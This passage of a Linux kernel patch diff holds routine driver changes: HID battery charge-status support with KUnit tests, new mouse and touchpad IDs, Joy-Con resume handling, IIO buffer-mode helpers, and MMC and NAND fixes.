++	KUNIT_EXPECT_TRUE(test, handled);
++	KUNIT_EXPECT_EQ(test, dev->battery_charge_status, POWER_SUPPLY_STATUS_CHARGING);
++}
++
++static void hid_test_input_get_battery_property(struct kunit *test)
++{
++	struct power_supply *psy;
++	struct hid_device *dev;
++	union power_supply_propval val;
++	int ret;
++
++	dev = kunit_kzalloc(test, sizeof(*dev), GFP_KERNEL);
++	KUNIT_ASSERT_NOT_ERR_OR_NULL(test, dev);
++	dev->battery_avoid_query = true;
++
++	psy = kunit_kzalloc(test, sizeof(*psy), GFP_KERNEL);
++	KUNIT_ASSERT_NOT_ERR_OR_NULL(test, psy);
++	psy->drv_data = dev;
++
++	dev->battery_status = HID_BATTERY_UNKNOWN;
++	dev->battery_charge_status = POWER_SUPPLY_STATUS_CHARGING;
++	ret = hidinput_get_battery_property(psy, POWER_SUPPLY_PROP_STATUS, &val);
++	KUNIT_EXPECT_EQ(test, ret, 0);
++	KUNIT_EXPECT_EQ(test, val.intval, POWER_SUPPLY_STATUS_UNKNOWN);
++
++	dev->battery_status = HID_BATTERY_REPORTED;
++	dev->battery_charge_status = POWER_SUPPLY_STATUS_CHARGING;
++	ret = hidinput_get_battery_property(psy, POWER_SUPPLY_PROP_STATUS, &val);
++	KUNIT_EXPECT_EQ(test, ret, 0);
++	KUNIT_EXPECT_EQ(test, val.intval, POWER_SUPPLY_STATUS_CHARGING);
++
++	dev->battery_status = HID_BATTERY_REPORTED;
++	dev->battery_charge_status = POWER_SUPPLY_STATUS_DISCHARGING;
++	ret = hidinput_get_battery_property(psy, POWER_SUPPLY_PROP_STATUS, &val);
++	KUNIT_EXPECT_EQ(test, ret, 0);
++	KUNIT_EXPECT_EQ(test, val.intval, POWER_SUPPLY_STATUS_DISCHARGING);
++}
++
++static struct kunit_case hid_input_tests[] = {
++	KUNIT_CASE(hid_test_input_set_battery_charge_status),
++	KUNIT_CASE(hid_test_input_get_battery_property),
++	{ }
++};
++
++static struct kunit_suite hid_input_test_suite = {
++	.name = "hid_input",
++	.test_cases = hid_input_tests,
++};
++
++kunit_test_suite(hid_input_test_suite);
++
++MODULE_DESCRIPTION("HID input KUnit tests");
++MODULE_LICENSE("GPL");
++MODULE_AUTHOR("José Expósito <jose.exposito89@gmail.com>");
+diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c
+index 77ee5e01e6111..4ba5df3c1e039 100644
+--- a/drivers/hid/hid-input.c
++++ b/drivers/hid/hid-input.c
+@@ -492,7 +492,7 @@ static int hidinput_get_battery_property(struct power_supply *psy,
+ 		if (dev->battery_status == HID_BATTERY_UNKNOWN)
+ 			val->intval = POWER_SUPPLY_STATUS_UNKNOWN;
+ 		else
+-			val->intval = POWER_SUPPLY_STATUS_DISCHARGING;
++			val->intval = dev->battery_charge_status;
+ 		break;
+ 
+ 	case POWER_SUPPLY_PROP_SCOPE:
+@@ -560,6 +560,7 @@ static int hidinput_setup_battery(struct hid_device *dev, unsigned report_type,
+ 	dev->battery_max = max;
+ 	dev->battery_report_type = report_type;
+ 	dev->battery_report_id = field->report->id;
++	dev->battery_charge_status = POWER_SUPPLY_STATUS_DISCHARGING;
+ 
+ 	/*
+ 	 * Stylus is normally not connected to the device and thus we
+@@ -626,6 +627,20 @@ static void hidinput_update_battery(struct hid_device *dev, int value)
+ 		power_supply_changed(dev->battery);
+ 	}
+ }
++
++static bool hidinput_set_battery_charge_status(struct hid_device *dev,
++					       unsigned int usage, int value)
++{
++	switch (usage) {
++	case HID_BAT_CHARGING:
++		dev->battery_charge_status = value ?
++					     POWER_SUPPLY_STATUS_CHARGING :
++					     POWER_SUPPLY_STATUS_DISCHARGING;
++		return true;
++	}
++
++	return false;
++}
+ #else  /* !CONFIG_HID_BATTERY_STRENGTH */
+ static int hidinput_setup_battery(struct hid_device *dev, unsigned report_type,
+ 				  struct hid_field *field, bool is_percentage)
+@@ -640,6 +655,12 @@ static void hidinput_cleanup_battery(struct hid_device *dev)
+ static void hidinput_update_battery(struct hid_device *dev, int value)
+ {
+ }
++
++static bool hidinput_set_battery_charge_status(struct hid_device *dev,
++					       unsigned int usage, int value)
++{
++	return false;
++}
+ #endif	/* CONFIG_HID_BATTERY_STRENGTH */
+ 
+ static bool hidinput_field_in_collection(struct hid_device *device, struct hid_field *field,
+@@ -1239,6 +1260,9 @@ static void hidinput_configure_usage(struct hid_input *hidinput, struct hid_fiel
+ 			hidinput_setup_battery(device, HID_INPUT_REPORT, field, true);
+ 			usage->type = EV_PWR;
+ 			return;
++		case HID_BAT_CHARGING:
++			usage->type = EV_PWR;
++			return;
+ 		}
+ 		goto unknown;
+ 
+@@ -1481,7 +1505,11 @@ void hidinput_hid_event(struct hid_device *hid, struct hid_field *field, struct
+ 		return;
+ 
+ 	if (usage->type == EV_PWR) {
+-		hidinput_update_battery(hid, value);
++		bool handled = hidinput_set_battery_charge_status(hid, usage->hid, value);
++
++		if (!handled)
++			hidinput_update_battery(hid, value);
++
+ 		return;
+ 	}
+ 
+@@ -2346,3 +2374,7 @@ void hidinput_disconnect(struct hid_device *hid)
+ 	cancel_work_sync(&hid->led_work);
+ }
+ EXPORT_SYMBOL_GPL(hidinput_disconnect);
++
++#ifdef CONFIG_HID_KUNIT_TEST
++#include "hid-input-test.c"
++#endif
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index fb427391c3b86..8d0dad12b2d37 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -4427,6 +4427,8 @@ static const struct hid_device_id hidpp_devices[] = {
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb008) },
+ 	{ /* MX Master mouse over Bluetooth */
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb012) },
++	{ /* M720 Triathlon mouse over Bluetooth */
++	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb015) },
+ 	{ /* MX Ergo trackball over Bluetooth */
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb01d) },
+ 	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb01e) },
+diff --git a/drivers/hid/hid-multitouch.c b/drivers/hid/hid-multitouch.c
+index 521b2ffb42449..8db4ae05febc8 100644
+--- a/drivers/hid/hid-multitouch.c
++++ b/drivers/hid/hid-multitouch.c
+@@ -2144,6 +2144,10 @@ static const struct hid_device_id mt_devices[] = {
+ 			USB_DEVICE_ID_MTP_STM)},
+ 
+ 	/* Synaptics devices */
++	{ .driver_data = MT_CLS_WIN_8_FORCE_MULTI_INPUT,
++		HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8,
++			USB_VENDOR_ID_SYNAPTICS, 0xcd7e) },
++
+ 	{ .driver_data = MT_CLS_WIN_8_FORCE_MULTI_INPUT,
+ 		HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8,
+ 			USB_VENDOR_ID_SYNAPTICS, 0xce08) },
+diff --git a/drivers/hid/hid-nintendo.c b/drivers/hid/hid-nintendo.c
+index 5bfc0c4504608..8a8a3dd8af0c1 100644
+--- a/drivers/hid/hid-nintendo.c
++++ b/drivers/hid/hid-nintendo.c
+@@ -2011,7 +2011,9 @@ static int joycon_read_info(struct joycon_ctlr *ctlr)
+ 	struct joycon_input_report *report;
+ 
+ 	req.subcmd_id = JC_SUBCMD_REQ_DEV_INFO;
++	mutex_lock(&ctlr->output_mutex);
+ 	ret = joycon_send_subcmd(ctlr, &req, 0, HZ);
++	mutex_unlock(&ctlr->output_mutex);
+ 	if (ret) {
+ 		hid_err(ctlr->hdev, "Failed to get joycon info; ret=%d\n", ret);
+ 		return ret;
+@@ -2040,6 +2042,85 @@ static int joycon_read_info(struct joycon_ctlr *ctlr)
+ 	return 0;
+ }
+ 
++static int joycon_init(struct hid_device *hdev)
++{
++	struct joycon_ctlr *ctlr = hid_get_drvdata(hdev);
++	int ret = 0;
++
++	mutex_lock(&ctlr->output_mutex);
++	/* if handshake command fails, assume ble pro controller */
++	if ((jc_type_is_procon(ctlr) || jc_type_is_chrggrip(ctlr)) &&
++	    !joycon_send_usb(ctlr, JC_USB_CMD_HANDSHAKE, HZ)) {
++		hid_dbg(hdev, "detected USB controller\n");
++		/* set baudrate for improved latency */
++		ret = joycon_send_usb(ctlr, JC_USB_CMD_BAUDRATE_3M, HZ);
++		if (ret) {
++			hid_err(hdev, "Failed to set baudrate; ret=%d\n", ret);
++			goto out_unlock;
++		}
++		/* handshake */
++		ret = joycon_send_usb(ctlr, JC_USB_CMD_HANDSHAKE, HZ);
++		if (ret) {
++			hid_err(hdev, "Failed handshake; ret=%d\n", ret);
++			goto out_unlock;
++		}
++		/*
++		 * Set no timeout (to keep controller in USB mode).
++		 * This doesn't send a response, so ignore the timeout.
++		 */
++		joycon_send_usb(ctlr, JC_USB_CMD_NO_TIMEOUT, HZ/10);
++	} else if (jc_type_is_chrggrip(ctlr)) {
++		hid_err(hdev, "Failed charging grip handshake\n");
++		ret = -ETIMEDOUT;
++		goto out_unlock;
++	}
++
++	/* get controller calibration data, and parse it */
++	ret = joycon_request_calibration(ctlr);
++	if (ret) {
++		/*
++		 * We can function with default calibration, but it may be
++		 * inaccurate. Provide a warning, and continue on.
++		 */
++		hid_warn(hdev, "Analog stick positions may be inaccurate\n");
++	}
++
++	/* get IMU calibration data, and parse it */
++	ret = joycon_request_imu_calibration(ctlr);
++	if (ret) {
++		/*
++		 * We can function with default calibration, but it may be
++		 * inaccurate. Provide a warning, and continue on.
++		 */
++		hid_warn(hdev, "Unable to read IMU calibration data\n");
++	}
++
++	/* Set the reporting mode to 0x30, which is the full report mode */
++	ret = joycon_set_report_mode(ctlr);
++	if (ret) {
++		hid_err(hdev, "Failed to set report mode; ret=%d\n", ret);
++		goto out_unlock;
++	}
++
++	/* Enable rumble */
++	ret = joycon_enable_rumble(ctlr);
++	if (ret) {
++		hid_err(hdev, "Failed to enable rumble; ret=%d\n", ret);
++		goto out_unlock;
++	}
++
++	/* Enable the IMU */
++	ret = joycon_enable_imu(ctlr);
++	if (ret) {
++		hid_err(hdev, "Failed to enable the IMU; ret=%d\n", ret);
++		goto out_unlock;
++	}
++
++out_unlock:
++	mutex_unlock(&ctlr->output_mutex);
++	return ret;
++}
++
+ /* Common handler for parsing inputs */
+ static int joycon_ctlr_read_handler(struct joycon_ctlr *ctlr, u8 *data,
+ 							      int size)
+@@ -2171,85 +2252,19 @@ static int nintendo_hid_probe(struct hid_device *hdev,
+ 
+ 	hid_device_io_start(hdev);
+ 
+-	/* Initialize the controller */
+-	mutex_lock(&ctlr->output_mutex);
+-	/* if handshake command fails, assume ble pro controller */
+-	if ((jc_type_is_procon(ctlr) || jc_type_is_chrggrip(ctlr)) &&
+-	    !joycon_send_usb(ctlr, JC_USB_CMD_HANDSHAKE, HZ)) {
+-		hid_dbg(hdev, "detected USB controller\n");
+-		/* set baudrate for improved latency */
+-		ret = joycon_send_usb(ctlr, JC_USB_CMD_BAUDRATE_3M, HZ);
+-		if (ret) {
+-			hid_err(hdev, "Failed to set baudrate; ret=%d\n", ret);
+-			goto err_mutex;
+-		}
+-		/* handshake */
+-		ret = joycon_send_usb(ctlr, JC_USB_CMD_HANDSHAKE, HZ);
+-		if (ret) {
+-			hid_err(hdev, "Failed handshake; ret=%d\n", ret);
+-			goto err_mutex;
+-		}
+-		/*
+-		 * Set no timeout (to keep controller in USB mode).
+-		 * This doesn't send a response, so ignore the timeout.
+-		 */
+-		joycon_send_usb(ctlr, JC_USB_CMD_NO_TIMEOUT, HZ/10);
+-	} else if (jc_type_is_chrggrip(ctlr)) {
+-		hid_err(hdev, "Failed charging grip handshake\n");
+-		ret = -ETIMEDOUT;
+-		goto err_mutex;
+-	}
+-
+-	/* get controller calibration data, and parse it */
+-	ret = joycon_request_calibration(ctlr);
++	ret = joycon_init(hdev);
+ 	if (ret) {
+-		/*
+-		 * We can function with default calibration, but it may be
+-		 * inaccurate. Provide a warning, and continue on.
+-		 */
+-		hid_warn(hdev, "Analog stick positions may be inaccurate\n");
+-	}
+-
+-	/* get IMU calibration data, and parse it */
+-	ret = joycon_request_imu_calibration(ctlr);
+-	if (ret) {
+-		/*
+-		 * We can function with default calibration, but it may be
+-		 * inaccurate. Provide a warning, and continue on.
+-		 */
+-		hid_warn(hdev, "Unable to read IMU calibration data\n");
+-	}
+-
+-	/* Set the reporting mode to 0x30, which is the full report mode */
+-	ret = joycon_set_report_mode(ctlr);
+-	if (ret) {
+-		hid_err(hdev, "Failed to set report mode; ret=%d\n", ret);
+-		goto err_mutex;
+-	}
+-
+-	/* Enable rumble */
+-	ret = joycon_enable_rumble(ctlr);
+-	if (ret) {
+-		hid_err(hdev, "Failed to enable rumble; ret=%d\n", ret);
+-		goto err_mutex;
+-	}
+-
+-	/* Enable the IMU */
+-	ret = joycon_enable_imu(ctlr);
+-	if (ret) {
+-		hid_err(hdev, "Failed to enable the IMU; ret=%d\n", ret);
+-		goto err_mutex;
++		hid_err(hdev, "Failed to initialize controller; ret=%d\n", ret);
++		goto err_close;
+ 	}
+ 
+ 	ret = joycon_read_info(ctlr);
+ 	if (ret) {
+ 		hid_err(hdev, "Failed to retrieve controller info; ret=%d\n",
+ 			ret);
+-		goto err_mutex;
++		goto err_close;
+ 	}
+ 
+-	mutex_unlock(&ctlr->output_mutex);
+-
+ 	/* Initialize the leds */
+ 	ret = joycon_leds_create(ctlr);
+ 	if (ret) {
+@@ -2275,8 +2290,6 @@ static int nintendo_hid_probe(struct hid_device *hdev,
+ 	hid_dbg(hdev, "probe - success\n");
+ 	return 0;
+ 
+-err_mutex:
+-	mutex_unlock(&ctlr->output_mutex);
+ err_close:
+ 	hid_hw_close(hdev);
+ err_stop:
+@@ -2306,6 +2319,20 @@ static void nintendo_hid_remove(struct hid_device *hdev)
+ 	hid_hw_stop(hdev);
+ }
+ 
++#ifdef CONFIG_PM
++
++static int nintendo_hid_resume(struct hid_device *hdev)
++{
++	int ret = joycon_init(hdev);
++
++	if (ret)
++		hid_err(hdev, "Failed to restore controller after resume");
++
++	return ret;
++}
++
++#endif
++
+ static const struct hid_device_id nintendo_hid_devices[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_NINTENDO,
+ 			 USB_DEVICE_ID_NINTENDO_PROCON) },
+@@ -2327,6 +2354,10 @@ static struct hid_driver nintendo_hid_driver = {
+ 	.probe		= nintendo_hid_probe,
+ 	.remove		= nintendo_hid_remove,
+ 	.raw_event	= nintendo_hid_event,
++
++#ifdef CONFIG_PM
++	.resume		= nintendo_hid_resume,
++#endif
+ };
+ module_hid_driver(nintendo_hid_driver);
+ 
+diff --git a/drivers/i2c/i2c-mux.c b/drivers/i2c/i2c-mux.c
+index 313904be5f3bd..57ff09f18c371 100644
+--- a/drivers/i2c/i2c-mux.c
++++ b/drivers/i2c/i2c-mux.c
+@@ -341,7 +341,7 @@ int i2c_mux_add_adapter(struct i2c_mux_core *muxc,
+ 		priv->adap.lock_ops = &i2c_parent_lock_ops;
+ 
+ 	/* Sanity check on class */
+-	if (i2c_mux_parent_classes(parent) & class)
++	if (i2c_mux_parent_classes(parent) & class & ~I2C_CLASS_DEPRECATED)
+ 		dev_err(&parent->dev,
+ 			"Segment %d behind mux can't share classes with ancestors\n",
+ 			chan_id);
+diff --git a/drivers/iio/adc/ad7192.c b/drivers/iio/adc/ad7192.c
+index 80eff7090f14a..faf680140c178 100644
+--- a/drivers/iio/adc/ad7192.c
++++ b/drivers/iio/adc/ad7192.c
+@@ -177,7 +177,7 @@ struct ad7192_chip_info {
+ struct ad7192_state {
+ 	const struct ad7192_chip_info	*chip_info;
+ 	struct regulator		*avdd;
+-	struct regulator		*dvdd;
++	struct regulator		*vref;
+ 	struct clk			*mclk;
+ 	u16				int_vref_mv;
+ 	u32				fclk;
+@@ -1011,24 +1011,34 @@ static int ad7192_probe(struct spi_device *spi)
+ 	if (ret)
+ 		return ret;
+ 
+-	st->dvdd = devm_regulator_get(&spi->dev, "dvdd");
+-	if (IS_ERR(st->dvdd))
+-		return PTR_ERR(st->dvdd);
++	ret = devm_regulator_get_enable(&spi->dev, "dvdd");
++	if (ret)
++		return dev_err_probe(&spi->dev, ret, "Failed to enable specified DVdd supply\n");
+ 
+-	ret = regulator_enable(st->dvdd);
+-	if (ret) {
+-		dev_err(&spi->dev, "Failed to enable specified DVdd supply\n");
+-		return ret;
+-	}
++	st->vref = devm_regulator_get_optional(&spi->dev, "vref");
++	if (IS_ERR(st->vref)) {
++		if (PTR_ERR(st->vref) != -ENODEV)
++			return PTR_ERR(st->vref);
+ 
+-	ret = devm_add_action_or_reset(&spi->dev, ad7192_reg_disable, st->dvdd);
+-	if (ret)
+-		return ret;
++		ret = regulator_get_voltage(st->avdd);
++		if (ret < 0)
++			return dev_err_probe(&spi->dev, ret,
++					     "Device tree error, AVdd voltage undefined\n");
++	} else {
++		ret = regulator_enable(st->vref);
++		if (ret) {
++			dev_err(&spi->dev, "Failed to enable specified Vref supply\n");
++			return ret;
++		}
+ 
+-	ret = regulator_get_voltage(st->avdd);
+-	if (ret < 0) {
+-		dev_err(&spi->dev, "Device tree error, reference voltage undefined\n");
+-		return ret;
++		ret = devm_add_action_or_reset(&spi->dev, ad7192_reg_disable, st->vref);
++		if (ret)
++			return ret;
++
++		ret = regulator_get_voltage(st->vref);
++		if (ret < 0)
++			return dev_err_probe(&spi->dev, ret,
++					     "Device tree error, Vref voltage undefined\n");
+ 	}
+ 	st->int_vref_mv = ret / 1000;
+ 
+diff --git a/drivers/iio/common/cros_ec_sensors/cros_ec_sensors_core.c b/drivers/iio/common/cros_ec_sensors/cros_ec_sensors_core.c
+index d98f7e4d202c1..1ddce991fb3f4 100644
+--- a/drivers/iio/common/cros_ec_sensors/cros_ec_sensors_core.c
++++ b/drivers/iio/common/cros_ec_sensors/cros_ec_sensors_core.c
+@@ -190,8 +190,11 @@ int cros_ec_sensors_push_data(struct iio_dev *indio_dev,
+ 	/*
+ 	 * Ignore samples if the buffer is not set: it is needed if the ODR is
+ 	 * set but the buffer is not enabled yet.
++	 *
++	 * Note: iio_device_claim_buffer_mode() returns -EBUSY if the buffer
++	 * is not enabled.
+ 	 */
+-	if (!iio_buffer_enabled(indio_dev))
++	if (iio_device_claim_buffer_mode(indio_dev) < 0)
+ 		return 0;
+ 
+ 	out = (s16 *)st->samples;
+@@ -210,6 +213,7 @@ int cros_ec_sensors_push_data(struct iio_dev *indio_dev,
+ 	iio_push_to_buffers_with_timestamp(indio_dev, st->samples,
+ 					   timestamp + delta);
+ 
++	iio_device_release_buffer_mode(indio_dev);
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(cros_ec_sensors_push_data);
+diff --git a/drivers/iio/industrialio-core.c b/drivers/iio/industrialio-core.c
+index f3f8392623a46..c9614982cb671 100644
+--- a/drivers/iio/industrialio-core.c
++++ b/drivers/iio/industrialio-core.c
+@@ -2084,6 +2084,44 @@ void iio_device_release_direct_mode(struct iio_dev *indio_dev)
+ }
+ EXPORT_SYMBOL_GPL(iio_device_release_direct_mode);
+ 
++/**
++ * iio_device_claim_buffer_mode - Keep device in buffer mode
++ * @indio_dev:	the iio_dev associated with the device
++ *
++ * If the device is in buffer mode it is guaranteed to stay
++ * that way until iio_device_release_buffer_mode() is called.
++ *
++ * Use with iio_device_release_buffer_mode().
++ *
++ * Returns: 0 on success, -EBUSY on failure.
++ */
++int iio_device_claim_buffer_mode(struct iio_dev *indio_dev)
++{
++	mutex_lock(&indio_dev->mlock);
++
++	if (iio_buffer_enabled(indio_dev))
++		return 0;
++
++	mutex_unlock(&indio_dev->mlock);
++	return -EBUSY;
++}
++EXPORT_SYMBOL_GPL(iio_device_claim_buffer_mode);
++
++/**
++ * iio_device_release_buffer_mode - releases claim on buffer mode
++ * @indio_dev:	the iio_dev associated with the device
++ *
++ * Release the claim. Device is no longer guaranteed to stay
++ * in buffer mode.
++ *
++ * Use with iio_device_claim_buffer_mode().
++ */
++void iio_device_release_buffer_mode(struct iio_dev *indio_dev)
++{
++	mutex_unlock(&indio_dev->mlock);
++}
++EXPORT_SYMBOL_GPL(iio_device_release_buffer_mode);
++
+ /**
+  * iio_device_get_current_mode() - helper function providing read-only access to
+  *				   the opaque @currentmode variable
+diff --git a/drivers/mmc/core/mmc.c b/drivers/mmc/core/mmc.c
+index 89cd48fcec79f..4a4bab9aa7263 100644
+--- a/drivers/mmc/core/mmc.c
++++ b/drivers/mmc/core/mmc.c
+@@ -104,7 +104,7 @@ static int mmc_decode_cid(struct mmc_card *card)
+ 	case 3: /* MMC v3.1 - v3.3 */
+ 	case 4: /* MMC v4 */
+ 		card->cid.manfid	= UNSTUFF_BITS(resp, 120, 8);
+-		card->cid.oemid		= UNSTUFF_BITS(resp, 104, 16);
++		card->cid.oemid		= UNSTUFF_BITS(resp, 104, 8);
+ 		card->cid.prod_name[0]	= UNSTUFF_BITS(resp, 96, 8);
+ 		card->cid.prod_name[1]	= UNSTUFF_BITS(resp, 88, 8);
+ 		card->cid.prod_name[2]	= UNSTUFF_BITS(resp, 80, 8);
+diff --git a/drivers/mmc/core/sdio.c b/drivers/mmc/core/sdio.c
+index f64b9ac76a5cd..5914516df2f7f 100644
+--- a/drivers/mmc/core/sdio.c
++++ b/drivers/mmc/core/sdio.c
+@@ -1089,8 +1089,14 @@ static int mmc_sdio_resume(struct mmc_host *host)
+ 		}
+ 		err = mmc_sdio_reinit_card(host);
+ 	} else if (mmc_card_wake_sdio_irq(host)) {
+-		/* We may have switched to 1-bit mode during suspend */
++		/*
++		 * We may have switched to 1-bit mode during suspend,
++		 * need to hold retuning, because tuning only supprt
++		 * 4-bit mode or 8 bit mode.
++		 */
++		mmc_retune_hold_now(host);
+ 		err = sdio_enable_4bit_bus(host->card);
++		mmc_retune_release(host);
+ 	}
+ 
+ 	if (err)
+diff --git a/drivers/mmc/host/mtk-sd.c b/drivers/mmc/host/mtk-sd.c
+index 1a0d4dc24717c..70e414027155d 100644
+--- a/drivers/mmc/host/mtk-sd.c
++++ b/drivers/mmc/host/mtk-sd.c
+@@ -655,11 +655,11 @@ static void msdc_reset_hw(struct msdc_host *host)
+ 	u32 val;
+ 
+ 	sdr_set_bits(host->base + MSDC_CFG, MSDC_CFG_RST);
+-	readl_poll_timeout(host->base + MSDC_CFG, val, !(val & MSDC_CFG_RST), 0, 0);
++	readl_poll_timeout_atomic(host->base + MSDC_CFG, val, !(val & MSDC_CFG_RST), 0, 0);
+ 
+ 	sdr_set_bits(host->base + MSDC_FIFOCS, MSDC_FIFOCS_CLR);
+-	readl_poll_timeout(host->base + MSDC_FIFOCS, val,
+-			   !(val & MSDC_FIFOCS_CLR), 0, 0);
++	readl_poll_timeout_atomic(host->base + MSDC_FIFOCS, val,
++				  !(val & MSDC_FIFOCS_CLR), 0, 0);
+ 
+ 	val = readl(host->base + MSDC_INT);
+ 	writel(val, host->base + MSDC_INT);
+diff --git a/drivers/mmc/host/sdhci-pci-gli.c b/drivers/mmc/host/sdhci-pci-gli.c
+index 4d509f6561887..c580ba089a261 100644
+--- a/drivers/mmc/host/sdhci-pci-gli.c
++++ b/drivers/mmc/host/sdhci-pci-gli.c
+@@ -756,42 +756,6 @@ static u32 sdhci_gl9750_readl(struct sdhci_host *host, int reg)
+ 	return value;
+ }
+ 
+-#ifdef CONFIG_PM_SLEEP
+-static int sdhci_pci_gli_resume(struct sdhci_pci_chip *chip)
+-{
+-	struct sdhci_pci_slot *slot = chip->slots[0];
+-
+-	pci_free_irq_vectors(slot->chip->pdev);
+-	gli_pcie_enable_msi(slot);
+-
+-	return sdhci_pci_resume_host(chip);
+-}
+-
+-static int sdhci_cqhci_gli_resume(struct sdhci_pci_chip *chip)
+-{
+-	struct sdhci_pci_slot *slot = chip->slots[0];
+-	int ret;
+-
+-	ret = sdhci_pci_gli_resume(chip);
+-	if (ret)
+-		return ret;
+-
+-	return cqhci_resume(slot->host->mmc);
+-}
+-
+-static int sdhci_cqhci_gli_suspend(struct sdhci_pci_chip *chip)
+-{
+-	struct sdhci_pci_slot *slot = chip->slots[0];
+-	int ret;
+-
+-	ret = cqhci_suspend(slot->host->mmc);
+-	if (ret)
+-		return ret;
+-
+-	return sdhci_suspend_host(slot->host);
+-}
+-#endif
+-
+ static void gl9763e_hs400_enhanced_strobe(struct mmc_host *mmc,
+ 					  struct mmc_ios *ios)
+ {
+@@ -1040,6 +1004,70 @@ static int gl9763e_runtime_resume(struct sdhci_pci_chip *chip)
+ }
+ #endif
+ 
++#ifdef CONFIG_PM_SLEEP
++static int sdhci_pci_gli_resume(struct sdhci_pci_chip *chip)
++{
++	struct sdhci_pci_slot *slot = chip->slots[0];
++
++	pci_free_irq_vectors(slot->chip->pdev);
++	gli_pcie_enable_msi(slot);
++
++	return sdhci_pci_resume_host(chip);
++}
++
++static int gl9763e_resume(struct sdhci_pci_chip *chip)
++{
++	struct sdhci_pci_slot *slot = chip->slots[0];
++	int ret;
++
++	ret = sdhci_pci_gli_resume(chip);
++	if (ret)
++		return ret;
++
++	ret = cqhci_resume(slot->host->mmc);
++	if (ret)
++		return ret;
++
++	/*
++	 * Disable LPM negotiation to bring device back in sync
++	 * with its runtime_pm state.
++	 */
++	gl9763e_set_low_power_negotiation(slot, false);
++
++	return 0;
++}
++
++static int gl9763e_suspend(struct sdhci_pci_chip *chip)
++{
++	struct sdhci_pci_slot *slot = chip->slots[0];
++	int ret;
++
++	/*
++	 * Certain SoCs can suspend only with the bus in low-
++	 * power state, notably x86 SoCs when using S0ix.
++	 * Re-enable LPM negotiation to allow entering L1 state
++	 * and entering system suspend.
++	 */
++	gl9763e_set_low_power_negotiation(slot, true);
++
++	ret = cqhci_suspend(slot->host->mmc);
++	if (ret)
++		goto err_suspend;
++
++	ret = sdhci_suspend_host(slot->host);
++	if (ret)
++		goto err_suspend_host;
++
++	return 0;
++
++err_suspend_host:
++	cqhci_resume(slot->host->mmc);
++err_suspend:
++	gl9763e_set_low_power_negotiation(slot, false);
++	return ret;
++}
++#endif
++
+ static int gli_probe_slot_gl9763e(struct sdhci_pci_slot *slot)
+ {
+ 	struct pci_dev *pdev = slot->chip->pdev;
+@@ -1147,8 +1175,8 @@ const struct sdhci_pci_fixes sdhci_gl9763e = {
+ 	.probe_slot	= gli_probe_slot_gl9763e,
+ 	.ops            = &sdhci_gl9763e_ops,
+ #ifdef CONFIG_PM_SLEEP
+-	.resume		= sdhci_cqhci_gli_resume,
+-	.suspend	= sdhci_cqhci_gli_suspend,
++	.resume		= gl9763e_resume,
++	.suspend	= gl9763e_suspend,
+ #endif
+ #ifdef CONFIG_PM
+ 	.runtime_suspend = gl9763e_runtime_suspend,
+diff --git a/drivers/mtd/maps/physmap-core.c b/drivers/mtd/maps/physmap-core.c
+index c73854da51363..19dad5a23f944 100644
+--- a/drivers/mtd/maps/physmap-core.c
++++ b/drivers/mtd/maps/physmap-core.c
+@@ -552,6 +552,17 @@ static int physmap_flash_probe(struct platform_device *dev)
+ 		if (info->probe_type) {
+ 			info->mtds[i] = do_map_probe(info->probe_type,
+ 						     &info->maps[i]);
++
++			/* Fall back to mapping region as ROM */
++			if (!info->mtds[i] && IS_ENABLED(CONFIG_MTD_ROM) &&
++			    strcmp(info->probe_type, "map_rom")) {
++				dev_warn(&dev->dev,
++					 "map_probe() failed for type %s\n",
++					 info->probe_type);
++
++				info->mtds[i] = do_map_probe("map_rom",
++							     &info->maps[i]);
++			}
+ 		} else {
+ 			int j;
+ 
+diff --git a/drivers/mtd/nand/raw/arasan-nand-controller.c b/drivers/mtd/nand/raw/arasan-nand-controller.c
+index ec7e6eeac55f9..e6ffe87a599eb 100644
+--- a/drivers/mtd/nand/raw/arasan-nand-controller.c
++++ b/drivers/mtd/nand/raw/arasan-nand-controller.c
+@@ -515,6 +515,7 @@ static int anfc_write_page_hw_ecc(struct nand_chip *chip, const u8 *buf,
+ 	struct mtd_info *mtd = nand_to_mtd(chip);
+ 	unsigned int len = mtd->writesize + (oob_required ? mtd->oobsize : 0);
+ 	dma_addr_t dma_addr;
++	u8 status;
+ 	int ret;
+ 	struct anfc_op nfc_op = {
+ 		.pkt_reg =
+@@ -561,10 +562,21 @@ static int anfc_write_page_hw_ecc(struct nand_chip *chip, const u8 *buf,
+ 	}
+ 
+ 	/* Spare data is not protected */
+-	if (oob_required)
++	if (oob_required) {
+ 		ret = nand_write_oob_std(chip, page);
++		if (ret)
++			return ret;
++	}
+ 
+-	return ret;
++	/* Check write status on the chip side */
++	ret = nand_status_op(chip, &status);
++	if (ret)
++		return ret;
++
++	if (status & NAND_STATUS_FAIL)
++		return -EIO;
++
++	return 0;
+ }
+ 
+ static int anfc_sel_write_page_hw_ecc(struct nand_chip *chip, const u8 *buf,
+diff --git a/drivers/mtd/nand/raw/marvell_nand.c b/drivers/mtd/nand/raw/marvell_nand.c
+index a57a1501449aa..d527c03630bce 100644
+--- a/drivers/mtd/nand/raw/marvell_nand.c
++++ b/drivers/mtd/nand/raw/marvell_nand.c
+@@ -1154,6 +1154,7 @@ static int marvell_nfc_hw_ecc_hmg_do_write_page(struct nand_chip *chip,
+ 		.ndcb[2] = NDCB2_ADDR5_PAGE(page),
+ 	};
+ 	unsigned int oob_bytes = lt->spare_bytes + (raw ? lt->ecc_bytes : 0);
++	u8 status;
+ 	int ret;
+ 
+ 	/* NFCv2 needs more information about the operation being executed */
+@@ -1187,7 +1188,18 @@ static int marvell_nfc_hw_ecc_hmg_do_write_page(struct nand_chip *chip,
+ 
+ 	ret = marvell_nfc_wait_op(chip,
